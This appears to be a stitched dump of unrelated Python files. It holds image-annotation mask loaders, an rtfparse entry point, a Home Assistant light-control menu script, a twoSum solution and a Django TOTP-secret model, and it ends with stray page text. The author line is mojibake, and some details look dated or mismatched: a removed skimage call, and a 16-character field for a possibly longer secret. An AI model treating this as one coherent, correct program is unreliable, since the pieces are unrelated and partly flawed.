    :param datacfg: dataset config; ``datacfg.name`` is the source name
    :param config: unused, kept for a uniform loader signature
    :return: (mask, class_ids, keys, values) where mask is a bool array of
        shape [height, width, num_annotations] with one channel per instance
    """
    annotations = info["annotations"]
    attributes = info["attributes"]
    name = datacfg.name
    class_ids = []
    class_labels = []
    mask = np.zeros([info["height"], info["width"], len(annotations)], dtype=np.uint8)
    for i, ann in enumerate(annotations):
        lbl_id = attributes[i]['lbl_id']
        ct_class_id = self.get_classid_from_source_class_name(name + ".{}".format(lbl_id))
        class_id = self.classinfo[ct_class_id]['id']
        class_label = self.get_classname_from_source_class_id(name + ".{}".format(class_id))
        # Sanity check: the label resolved via the id must round-trip back
        # to the raw label stored in the annotation.
        assert lbl_id == class_label
        if class_id:
            class_ids.append(ct_class_id)
        if class_label:
            class_labels.append(class_label)
        rr, cc = self.ann_to_geometry_via(ann)
        ## Clip dirty out-of-range coordinates; note this modifies rr/cc in
        ## place rather than creating result arrays.
        ## Ref: https://stackoverflow.com/questions/19666626/replace-all-elements-of-python-numpy-array-that-are-greater-than-some-value
        rr[rr > mask.shape[0] - 1] = mask.shape[0] - 1
        cc[cc > mask.shape[1] - 1] = mask.shape[1] - 1
        mask[rr, cc, i] = 1
    keys = ['image_name', 'image_id', 'image_source', 'class_ids', 'class_labels']
    values = [self.image_info[image_id]['id'], image_id, self.image_info[image_id]['source'], class_ids, class_labels]
    if class_ids:
        class_ids = np.array(class_ids, dtype=np.int32)
    # BUG FIX: np.bool was deprecated in NumPy 1.20 and removed in 1.24;
    # the builtin bool is the documented replacement.
    return mask.astype(bool), class_ids, keys, values
def load_mask_labelImg(self, image_id, info, datacfg=None, config=None):
    """Build the single-instance mask for a labelImg-annotated image.

    labelImg stores one bbox annotation per image_info record here, so the
    mask has exactly one channel.

    :param image_id: internal index into ``self.image_info``
    :param info: the image_info record; ``annotations`` is the bbox
        [top(y), left(x), height, width], ``attributes`` carries 'lbl_id'
    :param datacfg: dataset config; ``datacfg.name`` is the source name
    :param config: unused, kept for a uniform loader signature
    :return: (mask, class_ids, keys, values) where mask is a bool array of
        shape [height, width, 1]
    """
    name = datacfg.name
    annotations = info["annotations"]
    attributes = info["attributes"]
    class_ids = []
    class_labels = []
    # Build mask of shape [height, width, 1] and the class IDs that
    # correspond to each channel of the mask.
    mask = np.zeros([info["height"], info["width"], 1], dtype=np.uint8)
    lbl_id = attributes['lbl_id']
    ct_class_id = self.get_classid_from_source_class_name("{}.{}".format(name, lbl_id))
    class_id = self.classinfo[ct_class_id]['id']
    class_label = self.get_classname_from_source_class_id("{}.{}".format(name, class_id))
    # Sanity check: id-resolved label must round-trip to the raw label.
    assert lbl_id == class_label
    if class_label:
        class_labels.append(class_label)
    if class_id:
        class_ids.append(ct_class_id)
    # Get indexes of pixels inside the bbox and set them to 1.
    rr, cc = self.ann_to_geometry_labelImg(annotations)
    ## Clip dirty out-of-range coordinates; modifies rr/cc in place.
    ## Ref: https://stackoverflow.com/questions/19666626/replace-all-elements-of-python-numpy-array-that-are-greater-than-some-value
    rr[rr > mask.shape[0] - 1] = mask.shape[0] - 1
    cc[cc > mask.shape[1] - 1] = mask.shape[1] - 1
    mask[rr, cc, 0] = 1
    keys = ['image_name', 'image_id', 'image_source', 'class_ids', 'class_labels']
    values = [self.image_info[image_id]['id'], image_id, self.image_info[image_id]['source'], class_ids, class_labels]
    if class_ids:
        class_ids = np.array(class_ids, dtype=np.int32)
    # BUG FIX: np.bool was removed in NumPy 1.24; builtin bool is equivalent.
    return mask.astype(bool), class_ids, keys, values
def load_mask_hmd(self, image_id, info, datacfg=None, config=None):
    """Build per-instance masks for an HMD-annotated image.

    :param image_id: internal index into ``self.image_info``
    :param info: the image_info record; each annotation carries 'lbl_id'
        and a VIA-style 'shape_attributes' geometry
    :param datacfg: dataset config; ``datacfg.name`` is the source name
    :param config: unused, kept for a uniform loader signature
    :return: (mask, class_ids, keys, values) on success; delegates to the
        parent class (empty mask) when no valid instances are found
    """
    annotations = info["annotations"]
    name = datacfg.name
    instance_masks = []
    class_ids = []
    class_labels = []
    # Build masks of shape [height, width] per annotation and the list of
    # class IDs that correspond to each channel.
    for annotation in annotations:
        lbl_id = annotation['lbl_id']
        ct_class_id = self.get_classid_from_source_class_name("{}.{}".format(name, lbl_id))
        class_id = self.classinfo[ct_class_id]['id']
        class_label = self.get_classname_from_source_class_id("{}.{}".format(name, class_id))
        # Sanity check: id-resolved label must round-trip to the raw label.
        assert lbl_id == class_label
        if class_label:
            class_labels.append(class_label)
        if class_id:
            m = self.ann_to_mask_via(annotation["shape_attributes"], info["height"], info["width"])
            # Some objects are smaller than 1 pixel and get rounded out to
            # an empty mask — skip those.
            if m is not None and m.max() < 1:
                continue
            instance_masks.append(m)
            class_ids.append(ct_class_id)
    # Pack instance masks into a single [H, W, N] array.
    if class_ids:
        # BUG FIX: np.bool was removed in NumPy 1.24; builtin bool replaces it.
        mask = np.stack(instance_masks, axis=2).astype(bool)
        keys = ['image_name', 'image_id', 'image_source', 'class_ids', 'class_labels']
        values = [self.image_info[image_id]['id'], image_id, self.image_info[image_id]['source'], class_ids, class_labels]
        class_ids = np.array(class_ids, dtype=np.int32)
        return mask, class_ids, keys, values
    else:
        # Call the parent class to return an empty mask.
        return super(self.__class__, self).load_mask(image_id)
def ann_to_geometry_labelImg(self, ann):
    """Convert a labelImg bbox annotation into pixel coordinates.

    ``ann`` is a 4-sequence [top(y), left(x), height, width]; the first two
    entries are the rectangle start and the last two its extent.
    Ref: http://scikit-image.org/docs/0.8.0/api/skimage.draw.html

    :return: (rows, cols) index arrays covering the rectangle
    """
    top_left = (ann[0], ann[1])
    size = (ann[2], ann[3])
    rows, cols = skimage.draw.rectangle(top_left, extent=size)
    return rows, cols
def polyline2coords(self, points):
    """Return row and column coordinates for a polyline.

    Ref: https://www.programcreek.com/python/example/94226/skimage.draw.line

    >>> rr, cc = polyline2coords([(0, 0), (2, 2), (2, 4)])
    >>> list(rr)
    [0, 1, 2, 2, 3, 4]
    >>> list(cc)
    [0, 1, 2, 2, 2, 2]

    :param list of tuple points: Polyline in format [(x1,y1), (x2,y2), ...]
    :return: tuple with row and column coordinates in numpy arrays
    :rtype: tuple of numpy array
    """
    segments = []
    # Draw one line per consecutive point pair; skimage takes (r0, c0, r1, c1).
    for p0, p1 in zip(points[:-1], points[1:]):
        x0, y0, x1, y1 = map(int, p0 + p1)
        segments.append(skimage.draw.line(y0, x0, y1, x1))
    return [np.hstack(axis_coords) for axis_coords in zip(*segments)]
def ann_to_geometry_via(self, ann):
    """
    Load Different Geometry types specific to via tool
    Ref: http://scikit-image.org/docs/0.8.0/api/skimage.draw.html
    Ref: http://scikit-image.org/docs/0.14.x/api/skimage.draw.html#skimage.draw.line

    Dispatches on ann['name'] (polygon / rect / circle / ellipse / polyline)
    and returns (rr, cc) pixel index arrays; unsupported or malformed
    geometries return the empty default arrays below.
    """
    ## Default: empty index arrays returned for unsupported/malformed input.
    rr = np.zeros([0, 0, len(ann)],dtype=np.uint8)
    cc = np.zeros([0, 0, len(ann)],dtype=np.uint8)
    if ann['name'] == 'polygon':
        rr, cc = skimage.draw.polygon(ann['all_points_y'], ann['all_points_x'])
    elif ann['name'] == 'rect':
        ## x, y, width, height
        ## quck patch for old data having KeyError: missing 'y' or 'x'
        ## TODO: Error logging
        for attr in ['x','y','width','height']:
            if attr not in ann:
                return rr,cc
        ## skimage expects (row, col) order, i.e. (y, x) start / (h, w) extent.
        start = (ann['y'], ann['x'])
        extent = (ann['height'], ann['width'])
        rr, cc = skimage.draw.rectangle(start, extent=extent)
    elif ann['name'] == 'circle':
        ## NOTE(review): skimage.draw.circle was renamed to skimage.draw.disk
        ## and removed in scikit-image 0.19 — confirm the pinned skimage
        ## version, otherwise this branch raises AttributeError.
        rr, cc = skimage.draw.circle(ann['cy'], ann['cx'],ann['r'])
    elif ann['name'] == 'ellipse':
        rr, cc = skimage.draw.ellipse(ann['cy'], ann['cx'],ann['ry'],ann['rx'])
    elif ann['name'] == 'polyline':
        points = list(zip(ann['all_points_x'],ann['all_points_y']))
        rr,cc = self.polyline2coords(points)
    else:
        ## TBD: raise error
        log.info("Annotation Geometry Not Yet Supported")
        log.info("ann_to_mask_via: ann['name']: {}".format(ann['name']))
    return rr,cc
def ann_to_mask_via(self, ann, height, width):
    """
    Convert a VIA geometry annotation into a binary mask.

    :param ann: a VIA 'shape_attributes' dict (see ann_to_geometry_via)
    :param height: mask height in pixels
    :param width: mask width in pixels
    :return: binary mask (numpy 2D bool array)
    """
    mask = np.zeros([height, width], dtype=np.uint8)
    rr, cc = self.ann_to_geometry_via(ann)
    if rr is not None and cc is not None:
        ## Clip dirty out-of-range coordinates; note this modifies rr/cc in
        ## place rather than creating result arrays.
        ## Ref: https://stackoverflow.com/questions/19666626/replace-all-elements-of-python-numpy-array-that-are-greater-than-some-value
        rr[rr > mask.shape[0] - 1] = mask.shape[0] - 1
        cc[cc > mask.shape[1] - 1] = mask.shape[1] - 1
        mask[rr, cc] = 1
    # BUG FIX: np.bool was removed in NumPy 1.24; builtin bool is equivalent.
    return mask.astype(bool)
def image_reference(self, image_id, info=None, datacfg=None):
    """Return the path of the image, delegating foreign sources to the parent.

    :param image_id: internal index into ``self.image_info``
    :param info: optional pre-fetched image_info record
    :param datacfg: optional dataset config supplying the source name
    """
    info = info if info else self.image_info[image_id]
    name = datacfg.name if datacfg and datacfg.name else self.name
    if info["source"] == name:
        return info["path"]
    # BUG FIX: the parent-class result was computed but discarded, so this
    # method returned None for images from other sources.
    return super(self.__class__, self).image_reference(image_id)
|
#!/usr/bin/env python
import sys
from rtfparse import version
from rtfparse import entry
def rtfparse():
    """Console entry point: run the rtfparse CLI and exit with its status code."""
    exit_code = entry.cli_start(version.version)
    sys.exit(exit_code)


if __name__ == "__main__":
    rtfparse()
|
#!/usr/local/bin/python3
from whiptail import Whiptail
import requests
import json
# Home Assistant REST API base URL (replace YOURIP with the HA host).
endpoint = "http://YOURIP/api/"
# Request headers: long-lived access token plus JSON content type.
hass = {
    "Authorization": "Bearer YOURTOKEN",
    "Content-Type": "application/json"
}
# Device registry: menu name -> [entity_id, HA service domain, capability].
# Capability levels used below: 1 = on/off only, 2 = + brightness, 3 = + color.
devices = {
    'NAME1': ['DEVICEID','light',3],
    'NAME2': ['DEVICEID','light',3],
    'NAME3': ['DEVICEID','light',3]
}
def setStatus(device):
    """Ask on/off via whiptail and POST the matching service call to HA.

    :param device: [entity_id, service_domain, capability] triple
    """
    action = "turn_on" if w.confirm('SWITCH ON ?') else "turn_off"
    service = "services/{}/{}".format(device[1], action)
    payload = json.dumps({'entity_id': device[0]})
    response = requests.post(endpoint + service, headers=hass, data=payload)
    print(response.text)
def setBrightness(device):
    """Prompt for a 0-100% brightness and send it scaled to HA's 0-255 range.

    :param device: [entity_id, service_domain, capability] triple
    """
    service = "services/" + device[1] + "/turn_on"
    levels = ('0', '10', '20', '30', '40', '50', '60', '70', '80', '90', '100')
    percent = int(w.menu('SET BRIGHTNESS', levels).decode())
    scaled = round(percent / 100 * 255)
    payload = json.dumps({'entity_id': device[0], 'brightness': scaled})
    print(requests.post(endpoint + service, headers=hass, data=payload).text)
def setColor(device):
    """Prompt for a color; WHITE sends white_value/color_temp, others color_name.

    :param device: [entity_id, service_domain, capability] triple
    """
    service = "services/" + device[1] + "/turn_on"
    choices = ('WHITE', 'RED', 'ORANGE', 'YELLOW', 'GREEN', 'LIME', 'CYAN', 'BLUE', 'MAGENTA', 'PURPLE')
    color = w.menu('SET COLOR', choices).decode()
    if color == 'WHITE':
        body = {'entity_id': device[0], 'white_value': 255, 'color_temp': 288}
    else:
        body = {'entity_id': device[0], 'color_name': color}
    print(requests.post(endpoint + service, headers=hass, data=json.dumps(body)).text)
def chooseAction(device):
    """Show the action menu matching the device capability and dispatch it.

    :param device: [entity_id, service_domain, capability] triple; the
        capability level selects which actions are offered
    """
    if device[2] == 2:
        menu = ('STATUS', 'BRIGHTNESS')
    elif device[2] == 3:
        menu = ('STATUS', 'BRIGHTNESS', 'COLOR')
    else:
        # BUG FIX: `menu` was unbound for any other capability level,
        # raising UnboundLocalError; fall back to status-only.
        menu = ('STATUS',)
    ret = w.menu('CHOOSE ACTION', menu).decode()
    if ret == 'STATUS':
        setStatus(device)
    elif ret == 'BRIGHTNESS':
        setBrightness(device)
    elif ret == 'COLOR':
        setColor(device)
w = Whiptail()
# Menu entries: every device name plus a terminating EXIT item.
dat = tuple(list(devices.keys()) + ["EXIT"])
ret = ''
# Main loop: show the light picker until the user chooses EXIT.
while True:
    ret = w.menu('LIGHTS', dat).decode()
    if ret == 'EXIT':
        break
    dev = devices[ret]
    if dev[2] == 1:
        # On/off-only device: go straight to the status toggle.
        setStatus(dev)
    elif dev[2] > 1:
        # Richer device: offer the full action menu.
        chooseAction(dev)
|
# -*- coding: utf-8 -*-
# @Author: ไฝ็ฟ
# @Create Date: 2019-01-16 15:49:20
# @Last Modified by: ไฝ็ฟ
# @Last Modified time: 2019-01-16 15:53:13
class Solution:
    def twoSum(self, numbers, target):
        """Two-pointer search over a sorted (ascending) array.

        :type numbers: List[int]
        :type target: int
        :rtype: List[int] -- 1-based indices of the pair summing to target
        """
        lo = 0
        hi = len(numbers) - 1
        while lo < hi:
            current = numbers[lo] + numbers[hi]
            if current == target:
                return [lo + 1, hi + 1]
            if current > target:
                # Sum too large: move the right pointer to a smaller value.
                hi -= 1
            else:
                # Sum too small: move the left pointer to a larger value.
                lo += 1
|
from django.conf import settings
from django.db import models
import pyotp
class UserPSK(models.Model):
    """Stores a custom TOTP secret key per user."""
    # One secret per user; deleting the user cascades to the key.
    user = models.OneToOneField(settings.AUTH_USER_MODEL, related_name='psk', on_delete=models.CASCADE)
    # Base32 secret generated by pyotp.random_base32 at row creation.
    secret_key = models.CharField(max_length=16, default=pyotp.random_base32)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.